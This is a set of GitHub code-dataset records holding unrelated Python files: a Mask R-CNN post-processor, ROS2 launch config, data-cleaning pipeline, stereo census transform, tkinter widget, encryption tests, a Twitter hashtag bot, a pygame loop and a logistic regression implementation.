'dragon')\r\n\r\n# #Tim.Take_Damage('Slash', -100, 'dragon')\r\n\r\n# Tim.Get_health()\r\n\r\n# apple = FoodItem('Apple', 'A bruised red apple', 'Eat', 1)\r\n\r\n# Tim.inventory.Try_Add_Item(apple)\r\n\r\n# Tim.inventory.Get_Inventory()\r\n\r\n# Tim.Use_Item(apple)\r\n\r\n# Tim.Inspect_Room()\r\n\r\n# Tim.Set_Location('west')\r\n\r\n\r\n# test_list = [apple, apple, 'apple']\r\n# print(test_list[0].name)\r\n\r\n# 
def move_player(room_selection):\r\n# print(room_text)\r\n\r\n#class commands():\r\n \r\n\r\n# while game_active: \r\n \r\n# # ask player for name or quit command, if quit, run quit_command\r\n# PLAYER_NAME = input('Please choose a name or enter \"quit\" to exit: ')\r\n \r\n# if PLAYER_NAME == 'quit':\r\n# print('Please play again soon!')\r\n# game_active = False\r\n# else:\r\n# player_controller = Player(PLAYER_NAME)\r\n# player_controller.Return_status()\r\n# print('You must journey to the final room and defeat the dragon to' \r\n# 'win the game. \\nCollect items along the way to aid you in'\r\n# 'your quest. \\nType look around to examine the room you''re'\r\n# 'in. \\nType \"quit\" to exit')\r\n \r\n# player_controller.Player_command()\r\n \r\n ","repo_name":"ericborn/RPG","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38915088539","text":"#!/usr/bin/python\nimport math\nimport rospy\nimport pickle\nimport math\nimport cv2\nimport sys\nimport os\nimport rosbag\nimport multiprocessing\nimport time\nfrom numpy.linalg import eig\nfrom os import devnull\nfrom sklearn.cluster import DBSCAN\nfrom contextlib import contextmanager, redirect_stderr, redirect_stdout\nfrom tf_bag import BagTfTransformer\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncombinePath = \"../data/results/lanoising\"\nmodelName = \"scans-07-05-22-16_07_18.pth\"\n\ndatasetPath = \"../data/results/maskrcnn_scans\"\ndatasetPath = \"/home/broughtong/external/broughtong/imgs/\"\noutputPath = \"../data/results/maskrcnn_scans_reprocessed\"\noutputPath = \"/home/broughtong/external/broughtong/maskrcnn_scans_reprocessed\"\ncombinedOutPath = \"../data/results/maskrcnn_scans_rectified\"\ncombinedOutPath = \"/home/broughtong/external/broughtong/maskrcnn_scans_rectified\"\n\n@contextmanager\ndef suppress_stdout_stderr():\n with open(devnull, 'w') as fnull:\n with redirect_stderr(fnull) as err, redirect_stdout(fnull) as out:\n yield (err, out)\n\nclass Converter(multiprocessing.Process):\n def __init__(self, path, filename):\n multiprocessing.Process.__init__(self)\n\n self.filename = filename\n self.path = path\n\n def run(self):\n\n print(\"Process spawned for file %s\" % (self.filename), flush = True)\n\n with open(os.path.join(datasetPath, self.filename), \"rb\") as f:\n self.data = pickle.load(f)\n #combinefn = os.path.join(combinePath, self.filename.split(\".pickle\")[0]+\".pickle\")\n #with open(combinefn, \"rb\") as f:\n # self.combinedata = pickle.load(f)\n\n self.convert()\n self.data = None\n \n os.makedirs(os.path.join(outputPath, self.path), exist_ok=True)\n with open(os.path.join(outputPath, self.path, self.filename + \".annotations\"), \"wb\") as f:\n pickle.dump(self.annotations, f, protocol=2)\n\n def convert(self):\n\n annotations = []\n for idx in range(len(self.data[0][\"boxes\"])):\n box = self.data[0][\"boxes\"][idx]\n label = self.data[0][\"labels\"][idx]\n score = self.data[0][\"scores\"][idx]\n mask = self.data[0][\"masks\"][idx]\n\n if score < 0.9:\n continue\n\n x = (float(box[1]) + float(box[3])) / 2\n y = (float(box[0]) + float(box[2])) / 2\n res = 1024\n scale = 25\n x = (x - (res/2)) / scale\n y = (y - (res/2)) / scale\n\n mask = mask[math.floor(box[1]):math.ceil(box[3]), math.floor(box[0]):math.ceil(box[2])]\n\n coords = []\n for row in range(len(mask)):\n for val in range(len(mask[row])):\n mask[row][val] = (mask[row][val])*255\n if mask[row][val] > 50:\n coords.append([row, val])\n\n cov = np.cov(np.transpose(coords))\n w, v = eig(cov)\n bigIdx = 0\n if w[1] > w[0]:\n bigIdx = 1\n ev = v[bigIdx]\n rot = -math.atan2(ev[1], ev[0])\n annotation = [x, y, rot]\n annotations.append(annotation)\n self.annotations = annotations\n\nif __name__ == \"__main__\":\n \n #extract result from network output into files\n jobs = []\n for files in os.walk(os.path.join(datasetPath, modelName)):\n for filename in files[2]:\n if filename[-7:] == \".pickle\":\n if \".annotations.\" not in filename:\n jobs.append(Converter(modelName, filename))\n print(\"Spawned %i processes\" % (len(jobs)), flush = True)\n cpuCores = 50\n limit = cpuCores\n batch = cpuCores\n for i in range(len(jobs)):\n print(\"%i frame of %i\" % (i, len(jobs)))\n if i < limit:\n jobs[i].start()\n else:\n for j in range(limit):\n try:\n jobs[j].join()\n except ValueError:\n pass\n jobs[j].close()\n limit 
+= batch\n jobs[i].start()\n\n print(\"Jobs finished, checking them too\", flush=True)\n for job in jobs:\n try:\n job.join()\n #print(\"Job fine\", flush=True)\n except:\n #print(\"Job not fine\", flush=True)\n pass\n\n print(\"All jobs checked\", flush=True)\n\n #now we merge those detections into the original file structures\n #basically bring it into a common format\n combinableFilenames = []\n for files in os.walk(os.path.join(outputPath, modelName)):\n for filename in files[2]:\n if filename[-12:] == \".annotations\":\n combinableFilenames.append(os.path.join(files[0], filename.split(\".\")[0]))\n combinableFilenames = list(set(combinableFilenames))\n\n print(\"Combining %i files\" % (len(combinableFilenames)))\n\n for base in combinableFilenames:\n\n print(\"Combining bag\", base)\n modelPath = base.split(\"/\")[-2]\n print(modelPath)\n\n #open combinable file\n combineFile = \"\"\n for files in os.walk(combinePath):\n for filename in files[2]:\n if filename.split(\".\")[0] == base.split(\"/\")[-1]:\n subPath = files[0][len(combinePath)+1:]\n combineFile = os.path.join(subPath, filename)\n break\n\n if combineFile == \"\":\n print(\"Error combining \", filename)\n break\n\n data = []\n with open(os.path.join(combinePath, combineFile), \"rb\") as f:\n data = pickle.load(f)\n\n readyFiles = []\n for files in os.walk(outputPath):\n for filename in files[2]:\n print(filename)\n if filename[-12:] == \".annotations\":\n if filename.split(\".\")[0] == base.split(\"/\")[-1]:\n readyFiles.append(filename)\n\n print(len(readyFiles), len(data[\"ts\"]))\n #if len(readyFiles) != len(data[\"ts\"]):\n # print(\"Warning, frame mismatch\", base)\n\n data[\"maskrcnn\"] = []\n for i in range(len(data[\"scans\"])):\n data[\"maskrcnn\"].append([])\n\n #open each file, add it to the correct frame\n for filename in readyFiles:\n idx = int(filename.split(\".pickle-\")[1].split(\".\")[0])\n with open(os.path.join(outputPath, modelPath, filename), \"rb\") as f:\n annotations = pickle.load(f)\n data[\"maskrcnn\"][idx] = annotations\n \n #for i in range(len(readyFiles)):\n # if data[\"maskrcnn\"][i] == None:\n # print(\"Warning, empty frame found\")\n\n os.makedirs(os.path.join(combinedOutPath, modelPath), exist_ok=True)\n print(\"Saving to %s\" % (os.path.join(combinedOutPath, modelPath, base.split(\"/\")[-1] + \".bag.pickle\")))\n with open(os.path.join(combinedOutPath, modelPath, base.split(\"/\")[-1] + \".bag.pickle\"), \"wb\") as f:\n pickle.dump(data, f, protocol=2)\n","repo_name":"broughtong/car-detector","sub_path":"evaluation/prepare_maskrcnn.py","file_name":"prepare_maskrcnn.py","file_ext":"py","file_size_in_byte":7019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
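Converter.convert above estimates box orientation from the covariance of the mask's pixel coordinates and its dominant eigenvector. An isolated sketch on a synthetic elongated mask; note that np.linalg.eig returns eigenvectors as columns, so v[:, i] is the vector paired with w[i]:

import math
import numpy as np
from numpy.linalg import eig

coords = [[i, i] for i in range(20)]    # mask pixels along a 45-degree line

cov = np.cov(np.transpose(coords))
w, v = eig(cov)
ev = v[:, int(np.argmax(w))]            # eigenvector of the larger eigenvalue
rot = -math.atan2(ev[1], ev[0])
print(rot)    # ~ -pi/4 up to sign, since an eigenvector's direction is arbitrary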
+{"seq_id":"31818841692","text":"from codecs import open\nfrom os import path\n\nfrom setuptools import setup\n\nbasedir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(basedir, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"macaroni\",\n version=\"0.0.3\",\n description=\"A lib to help you avoid spaghetti code\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/rudineirk/py-macaroni\",\n author=\"Rudinei Goi Roecker\",\n author_email=\"rudinei.roecker@gmail.com\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries :: Application Frameworks\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n ],\n keywords=\"clean cleancode logic functional\",\n packages=[\"macaroni\"],\n)\n","repo_name":"rudineirk/py-macaroni","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9706761878","text":"import os\n\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.conditions import IfCondition\nfrom launch.substitutions import LaunchConfiguration\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch_ros.actions import Node\nfrom ament_index_python.packages import get_package_share_directory\n\n\ndef generate_launch_description():\n stretch_core_path = get_package_share_directory('stretch_core')\n stretch_navigation_path = get_package_share_directory('stretch_nav2')\n navigation_bringup_path = get_package_share_directory('nav2_bringup')\n \n teleop_type_param = DeclareLaunchArgument(\n 'teleop_type', default_value=\"joystick\", description=\"how to teleop ('keyboard', 'joystick' or 'none')\")\n \n use_sim_time_param = DeclareLaunchArgument(\n 'use_sim_time',\n default_value='false',\n description='Use simulation/Gazebo clock')\n\n autostart_param = DeclareLaunchArgument(\n 'autostart',\n default_value='false',\n description='Whether to autostart lifecycle nodes on launch')\n\n map_path_param = DeclareLaunchArgument(\n 'map',\n default_value=os.path.join(stretch_navigation_path,\n 'map', 'home2.yaml'),\n description='Full path to the map.yaml file to use for navigation')\n\n params_file_param = DeclareLaunchArgument(\n 'params_file',\n default_value=os.path.join(stretch_navigation_path, 'config', 'nav2_params.yaml'),\n description='Full path to the ROS2 parameters file to use for all launched nodes')\n\n rviz_param = DeclareLaunchArgument('use_rviz', default_value='true', choices=['true', 'false'])\n\n stretch_driver_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_core_path, '/launch/stretch_driver.launch.py']),\n launch_arguments={'mode': 'navigation', 'broadcast_odom_tf': 'True'}.items())\n\n rplidar_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_core_path, '/launch/rplidar.launch.py']))\n\n base_teleop_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_navigation_path, '/launch/teleop_twist.launch.py']),\n launch_arguments={'teleop_type': LaunchConfiguration('teleop_type')}.items())\n\n navigation_bringup_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([stretch_navigation_path, '/launch/bringup_launch.py']),\n launch_arguments={'use_sim_time': LaunchConfiguration('use_sim_time'), \n 'autostart': LaunchConfiguration('autostart'),\n 'map': LaunchConfiguration('map'),\n 'params_file': LaunchConfiguration('params_file'),\n 'use_rviz': LaunchConfiguration('use_rviz')}.items())\n\n rviz_launch = IncludeLaunchDescription(\n PythonLaunchDescriptionSource([navigation_bringup_path, '/launch/rviz_launch.py']),\n condition=IfCondition(LaunchConfiguration('use_rviz')))\n\n return LaunchDescription([\n teleop_type_param,\n use_sim_time_param,\n autostart_param,\n map_path_param,\n params_file_param,\n rviz_param,\n stretch_driver_launch,\n rplidar_launch,\n base_teleop_launch,\n navigation_bringup_launch,\n rviz_launch,\n ])\n","repo_name":"hello-robot/stretch_ros2","sub_path":"stretch_nav2/launch/navigation.launch.py","file_name":"navigation.launch.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"69"}
+{"seq_id":"33583815194","text":"infile = \"input.txt\"\n\nwith open(infile) as f:\n data = [ int(i) for i in f.read().split(\",\") ]\n\nmx = max(data)\nmn = min(data)\nfuel = float(\"inf\")\n\nfor i in range(mn, mx):\n s = 0\n for x in data:\n s += sum([x for x in range(1, abs(x - i) + 1)])\n fuel = min(fuel, s)\nprint(fuel)","repo_name":"calle2021/aoc2021","sub_path":"d7/d7_part2.py","file_name":"d7_part2.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"69828013980","text":"from feature_engineering import *\n\nclass PipelineCorrelation:\n \n \n @staticmethod\n def clean(X, y, options: dict):\n \"\"\"\n mca_keep_features_min\n min_correlation\n tree_percentage_important\n \"\"\"\n \n history = dict()\n \n # Multicolinearity\n multicolinear_columns = getMulticolinearColumns(np.abs(X.corr()), keep_features_min = options.get('mca_keep_features_min', 6))\n X = X.drop(multicolinear_columns, axis=1)\n history['multicolinear_columns'] = multicolinear_columns\n\n # Low correlation\n history['low_correlations'] = dict()\n low_correlations_labels, low_correlations_abs = getLowCorrelationsWithTarget(X, y, min_correlation=options.get('min_correlation', 0.1))\n \n history['low_correlations']['low_correlations_labels'] = low_correlations_labels\n history['low_correlations']['low_correlations_abs'] = low_correlations_abs\n \n \n X = X.drop(low_correlations_labels, axis=1)\n \n \n number_features_to_select = int(len(X.columns) * options.get('tree_percentage_important', 0.8))\n # Important features, the 80% most important\n if number_features_to_select > 0 and number_features_to_select < len(X.columns):\n features_important = getImportantFeatures(X, y, number_features_to_select, max_features = number_features_to_select)\n history['features_important'] = features_important\n X = X.loc[:,features_important]\n else:\n history['features_important'] = X.columns \n \n return X, history\n \n \n# Basic cleaning for consuming\nimport math\n\nclass PA:\n # Pipeline Actions\n DROP = 0\n TYPECAST = 1\n # SCALE = 2\n REPLACE = 3\n RENAME = 4\n REPLACE_WITH_MODE = 5\n REPLACE_WITH_MEDIAN = 6\n RENAME_LOWER_CASE = 7\n CREATE_DUMMIES = 8\n\n PIPELINE_BASE_COMMON_INT = [\n [REPLACE_WITH_MEDIAN,[np.nan]], \n [TYPECAST,np.int16],\n [RENAME_LOWER_CASE],\n ]\n\n PIPELINE_BASE_COMMON_MODE_INT = [\n [REPLACE_WITH_MODE,[np.nan]],\n [TYPECAST,np.int16],\n [RENAME_LOWER_CASE],\n ]\n\n @staticmethod\n def is_real_number(x):\n try:\n cast_x = float(x)\n if math.isnan(cast_x):\n return False\n else:\n return True\n except:\n return False\n\n @staticmethod\n def exec(df: pd.DataFrame, data_scheme:dict):\n df_result: pd.DataFrame = df.copy()\n\n columns = df.columns\n for c in columns:\n try:\n column = c\n pipeline_actions = data_scheme.get(column,[])\n \n for pa_group in pipeline_actions:\n pa = pa_group[0]\n\n if pa == PA.DROP:\n df_result.drop(column, axis=1,inplace=True)\n elif pa == PA.REPLACE:\n map_replace = {}\n for key,value in zip(pa_group[1],pa_group[2]):\n map_replace[key] = value\n\n df_result[column].replace(map_replace, inplace=True)\n elif pa == PA.TYPECAST:\n df_result[column] = df_result[column].astype(pa_group[1])\n\n elif pa == PA.REPLACE_WITH_MODE:\n mode = df_result[df_result[column].notna()][column].mode()[0]\n map_replace = {}\n for key in pa_group[1]:\n map_replace[key] = mode\n df_result[column].replace(map_replace, inplace=True)\n\n elif pa == PA.REPLACE_WITH_MEDIAN:\n # works even if exist text in the column\n median = df_result[df_result[column].apply(PA.is_real_number)][column].median()\n map_replace = {}\n for key in pa_group[1]:\n map_replace[key] = median\n df_result[column].replace(map_replace, inplace=True)\n elif pa == PA.RENAME:\n column_new = pa_group[1]\n df_result.rename(columns={column: column_new}, inplace=True)\n column = column_new\n elif pa == PA.RENAME_LOWER_CASE:\n column_new = column.lower()\n df_result.rename(columns={column: column_new}, inplace=True)\n column = column_new\n elif pa == PA.CREATE_DUMMIES:\n df_result = 
df_result.join(pd.get_dummies(df_result[column], prefix=column))\n df_result.drop(column, axis=1, inplace=True)\n else:\n print(\"ERROR, unknown PA\", pa)\n\n except Exception as e:\n print(f\"Error while processing column '{column}'\", e)\n\n\n return df_result\n","repo_name":"Magody/DataScience","sub_path":"lib/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
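A small usage sketch of PA.exec from the record above (assumes the PA class is in scope; the DataFrame and scheme are invented for illustration):

import numpy as np
import pandas as pd

df = pd.DataFrame({"Age": [25, np.nan, 40], "City": ["NY", "LA", "NY"]})

scheme = {
    "Age": PA.PIPELINE_BASE_COMMON_INT,    # median-fill NaN, cast to int16, lower-case the name
    "City": [[PA.RENAME_LOWER_CASE], [PA.CREATE_DUMMIES]],
}

clean = PA.exec(df, scheme)
print(clean.columns.tolist())    # ['age', 'city_LA', 'city_NY']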
+{"seq_id":"18212334749","text":"import sys\nimport time as t\nimport numpy as np\n\nfrom depthy.misc import Normalizer\n\n\ndef compute_census(img_l: np.ndarray = None, img_r: np.ndarray = None, offset: int = 7) -> (np.ndarray, np.ndarray):\n \"\"\"\n Census feature extraction (for more details see https://en.wikipedia.org/wiki/Census_transform)\n\n :param img_l: left image\n :param img_r: right image\n :param offset: pixel offset on the four image borders\n :return: lcensus_values, rcensus_values\n \"\"\"\n\n h, w, c = img_l.shape if len(img_l.shape) == 3 else img_l.shape + (1,)\n\n # convert to float\n img_l, img_r = Normalizer(img_l).norm_fun(), Normalizer(img_r).norm_fun()\n\n lcensus_values = np.zeros(shape=(h, w), dtype=np.uint64)\n rcensus_values = np.zeros(shape=(h, w), dtype=np.uint64)\n print('\\tLeft and right census...', end='')\n sys.stdout.flush()\n dawn = t.time()\n # exclude pixels on the border (they will have no census values)\n for y in range(offset, h-offset):\n for x in range(offset, w-offset):\n\n # extract left block region and subtract current pixel intensity as offset from it\n image = img_l[y - offset:y + offset + 1, x - offset:x + offset + 1]\n roi_offset = image - img_l[y, x]\n # census calculation left image\n lcensus_values[y, x] = vectorized_census(roi_offset)\n\n # extract right block region and subtract current pixel intensity as offset from it\n image = img_r[y - offset:y + offset + 1, x - offset:x + offset + 1]\n roi_offset = image - img_r[y, x]\n # census calculation right image\n rcensus_values[y, x] = vectorized_census(roi_offset)\n\n dusk = t.time()\n print('\\t(done in {:.2f}s)'.format(dusk - dawn))\n\n return lcensus_values, rcensus_values\n\n\ndef vectorized_census(roi: np.ndarray = None) -> int:\n \"\"\"\n Compute census in a numpy-vectorized fashion.\n\n :param roi: Region of Interest (RoI)\n :return: census value\n \"\"\"\n\n if len(roi.shape) != 2:\n raise Exception('Data must be 2-dimensional')\n\n # binary census vector\n b = np.array(roi < 0).flatten()\n # remove central value\n central_idx = (roi.shape[0]*roi.shape[1])//2\n b = np.delete(b, central_idx)\n # convert binary vector to integer\n num = b.dot(1 << np.arange(b.size)[::-1])\n\n return num\n","repo_name":"hahnec/depthy","sub_path":"depthy/stereo/feature_methods.py","file_name":"feature_methods.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"69"}
+{"seq_id":"14323504024","text":"import tkinter as tk\nroot = tk.Tk()\nbackClr = \"white\"\nfrontClr = \"black\"\nmidClr = \"EEEEEE\"\n\ncWidth = 100\ncHeight = 100\nx1 = 0\ny1 = 0\nx2 = cWidth\ny2 = cHeight\nbWidth = 25\next = 28\n\ncanvas = tk.Canvas(root, width=cWidth, height= cHeight, background=backClr)\ncanvas.pack()\n\ncanvas.create_oval(x1, y1, x2, y2, fill=midClr , outline=midClr)\ncanvas.create_arc(x1, y1, x2, y2, fill=frontClr , extent=ext)\ncanvas.create_oval(x1 + bWidth, y1 + bWidth, x2 - bWidth ,y2 - bWidth, fill = backClr, outline = backClr)\ncanvas.create_text(cWidth / 2, cHeight/2,text=ext)\ntk.mainloop()","repo_name":"ftp5500/circular-progress-bar","sub_path":"circular_progressPar.py","file_name":"circular_progressPar.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8834225408","text":"import pytest\n\nfrom v6_carrier_py.encryption import salthash, encrypt_identifiers\nimport pandas as pd\n\n\ndef test_salthash():\n salt = 'a' * 128\n string = 'hash me please'\n result = salthash(salt, string)\n assert result == 'EQ2Fczw0MVu0zqH30I0Vffbkga7SJO9tmnWjU2ZNf9gJeHa' \\\n 'EETF9wJY13YPqdhsVwSMK1v+zVYYB6cgjDjHIjA=='\n\n\nclass TestEncryptIdentifiers:\n test_df = pd.DataFrame.from_dict({\n 'identifier1': ['a', 'b'],\n 'identifier2': ['c', 'd'],\n 'value1': [1, 2]\n })\n test_identifiers = ['identifier1', 'identifier2']\n test_salt = 'a' * 128\n\n def test_encrypt_identifiers(self):\n result_df = encrypt_identifiers(self.test_df, self.test_salt,\n identifiers=self.test_identifiers)\n for identifier in self.test_identifiers:\n assert identifier not in result_df\n assert 'encrypted_identifier' in result_df\n\n def test_encrypt_identifiers_wrong_identifiers(self):\n test_wrong_identifiers = ['wrong_variable']\n with pytest.raises(KeyError):\n encrypt_identifiers(self.test_df, self.test_salt,\n identifiers=test_wrong_identifiers)\n\n def test_encrypt_identifiers_null_values(self):\n test_df = self.test_df.copy()\n test_df['identifier1'] = None\n with pytest.raises(ValueError):\n encrypt_identifiers(test_df, self.test_salt,\n identifiers=self.test_identifiers)\n","repo_name":"CARRIER-project/vantage6-algorithms","sub_path":"tests/test_encryption.py","file_name":"test_encryption.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9223731962","text":"\"\"\"\nadmin.py\n=======================================\nThis module contains the classes which register Locations and Coord to the\ndjango Admin framework which allows superusers to modify and edit data sorted in\nthe database tables created from the models.\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom django.utils.http import urlencode\nfrom django.utils.safestring import SafeString\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.models import User\nfrom exeterDomination.models import Locations, CoOrds\n\n\n\nclass CustomUserAdmin(UserAdmin):\n \"\"\"\n This class is required for an Admin to create their own user of any type\n They can also assign buildings to them\n \"\"\"\n list_display = [\n 'id',\n 'username',\n 'is_active',\n 'date_joined',\n 'is_staff',\n \"claimedBy\"]\n\n def claimedBy(self, obj):\n \"\"\"\n This function is used to assign a building to a newly created user\n \"\"\"\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"claimedBy_id\": obj.id})\n )\n return format_html('{} Locations Claimed ', url,\n len(Locations.objects.filter(claimedBy_id=obj.id)))\n\n\n\nadmin.site.unregister(User)\nCustomUserAdmin.claimedBy.short_description = \"Current Claims\"\nadmin.site.register(User, CustomUserAdmin)\n\n\n@admin.register(Locations)\nclass LocationsAdmin(admin.ModelAdmin):\n \"\"\"\n This class is required to register the Locations Model with the Django Admin.\n This therefore allows any superusers (Game Keepers) acessing the project via\n the admin page to modify the Locations in the database.\n \"\"\"\n list_display = (\n \"name\",\n \"topRightCoordinate\",\n \"bottomLeftCoordinate\",\n \"claimedLink\",\n )\n\n def claimedLink(self, obj):\n \"\"\"\n This function is used to give the class it's functionality in changing\n locations in the database\n \"\"\"\n url = (\n reverse(\"admin:auth_user_changelist\")\n + \"?\"\n + urlencode({\"username\": f\"{obj.claimedBy}\"})\n )\n return format_html('{} ', url, obj.claimedBy)\n\n claimedLink.short_description = \"Claimed By\"\n\n\n@admin.register(CoOrds)\nclass CoOrdsAdmin(admin.ModelAdmin):\n \"\"\"\n This class is required to register the Coord Model with the Django Admin.\n This therefore allows any superusers (Game Keepers) acessing the project via\n the admin page to modify the Coord in the database.\n \"\"\"\n list_display = (\"id\", \"longitude\", \"latitude\", \"linked_location\")\n\n def linked_location(self, obj) -> SafeString:\n \"\"\"\n This function allows the superuser to change coordinates for\n a specific location\n \"\"\"\n if len(Locations.objects.filter(bottomLeftCoordinate_id=obj.id)) == 1:\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"bottomLeftCoordinate_id\": f\"{obj.id}\"})\n )\n return format_html(\n '{} ',\n url,\n Locations.objects.get(\n bottomLeftCoordinate=obj.id).name)\n elif len(Locations.objects.filter(topRightCoordinate_id=obj.id)):\n url = (\n reverse(\"admin:exeterDomination_locations_changelist\")\n + \"?\"\n + urlencode({\"topRightCoordinate_id\": f\"{obj.id}\"})\n )\n return format_html(\n '{} ',\n url,\n Locations.objects.get(\n 
topRightCoordinate_id=obj.id).name)\n","repo_name":"TreeveWhite/ecm2434-project","sub_path":"TheProject/exeterDomination/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"72209002141","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport tweepy, time, sys \n\nargfile = str(sys.argv[1])\n\n#connect to Twitter API:\nCONSUMER_KEY = 'secret'\nCONSUMER_SECRET = 'secret'\nACCESS_KEY = 'secret'\nACCESS_SECRET = 'secret'\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth)\n\nfilename=open(argfile,'r')\nf=filename.readlines()\nfilename.close()\n\nfor line in f:\n trends1 = api.trends_place(1)\n hashtags = [x['name'] for x in trends1[0]['trends'] if x['name'].startswith('#')]\n trend_hashtag = None\n if len(hashtags[0]) <= 20:\n trend_hashtag = hashtags[0]\n elif len(hashtags[1]) <= 20:\n trend_hashtag = hashtags[1]\n elif len(hashtags[2]) <= 20:\n trend_hashtag = hashtags[2]\n if trend_hashtag:\n api.update_status(line + trend_hashtag)\n time.sleep(3*60*60)\n else:\n time.sleep(15*60)\n","repo_name":"bcrvc/gilles_delulz","sub_path":"bot_improved.py","file_name":"bot_improved.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"70313413981","text":"import pygame\n\nfrom Game import Game\n\nGO = True\nCOUNT = 0\n\ngame = Game(\"level1.txt\")\n\nwhile GO:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n GO = False\n\n game.move_particles(COUNT)\n\n COUNT += 1\n if(COUNT >= 99):\n COUNT = 0\n\n game.draw_window()\n \ngame.quitAlgo()","repo_name":"billonalex/AlgoGen_Parcours","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16908607345","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.model_selection import train_test_split\nfrom datetime import datetime\nstart_time = datetime.now()\n\n\nclass Logistics_Gradient_Descent():\n \n\n def __init__(self):\n \n self.bias_weights = None\n self.log_bias_weights = None\n self.log_error = None\n \n def prediction(self, X):\n linear_prediction = np.dot(X, self.bias_weights.T)\n predict = self.sigmoid_activation(linear_prediction)\n predict = np.round(predict)\n return predict\n \n def sigmoid_activation(self, predicted):\n\n sigmoid_function = np.array([])\n for i in range(len(predicted)):\n \n sigmoid_function = np.append(sigmoid_function, 1.0 / (1.0 + np.exp(-predicted[i])))\n \n \n #return 1.0 if sigmoid_function >= .5 else 0\n return sigmoid_function.reshape(-1,1)\n \n #Cost/Loss function: Logistic\n def cost_function(self, actual, predicted, X):\n \n m = len(actual)\n\n cost = - np.sum(actual * np.log(predicted) + (1-actual) * np.log(1-predicted)) / m \n # for i in range(len(actual)):\n # cost += actual[i] * np.log(self.sigmoid_activation(predicted[i])) + (1-actual[i]) * np.log(1-self.sigmoid_activation(predicted[i]))\n \n # return - cost / m\n \n def gradient_descent(self, actual, X, n_iterations = 1000 ,learn_rate = 0.1 ):\n \n \n self.bias_weights = np.array(np.zeros(X.shape[1]))\n\n self.bias_weights = self.bias_weights.reshape(1,X.shape[1])\n \n self.log_bias_weights = []\n self.log_error = []\n \n m = len(actual)\n for _ in range(n_iterations):\n \n linear_prediction = np.dot(X, self.bias_weights.T)\n sigmoid_prediction = self.sigmoid_activation(linear_prediction)\n error = sigmoid_prediction - actual\n\n gradient = np.dot(error.T, X) / m\n \n self.bias_weights = self.bias_weights - learn_rate * gradient\n \n self.log_bias_weights.append(self.bias_weights)\n self.log_error.append(error)\n\n return self.log_bias_weights, self.log_error\n\n \ndef normalize(X):\n X_normed = (X - X.min()) / (X.max() - X.min())\n \n return X_normed\n\n#load dataset\ndataset2 = pd.read_csv('pima-indians-diabetes.csv',header=None)\ndataset = normalize(dataset2)\n\n#seperate the features\nX = np.array(dataset.iloc[:,0:dataset.shape[1]-1])\n\nX = np.pad(X, [(0,0),(1,0)], mode='constant', constant_values = 1)\n\n\n#seperate the values\ny = np.array(dataset.iloc[:,-1])\ny = y.reshape(-1,1)\n\nX_train, X_test, y_train, y_test= train_test_split(X, y, test_size = 0.1)\n\n\n#initialize the Logistic Regression Class\n\nLR = Logistics_Gradient_Descent()\n\nlog_bw, log_error = LR.gradient_descent(y_train, X_train, n_iterations=100, learn_rate = 0.1)\n\n\nprediction = LR.prediction(X_test)\n\ncorrect = 0\nfor i in range(len(y_test)):\n if prediction[i] == y_test[i]:\n correct += 1\nprint(correct / float(len(y_test)) * 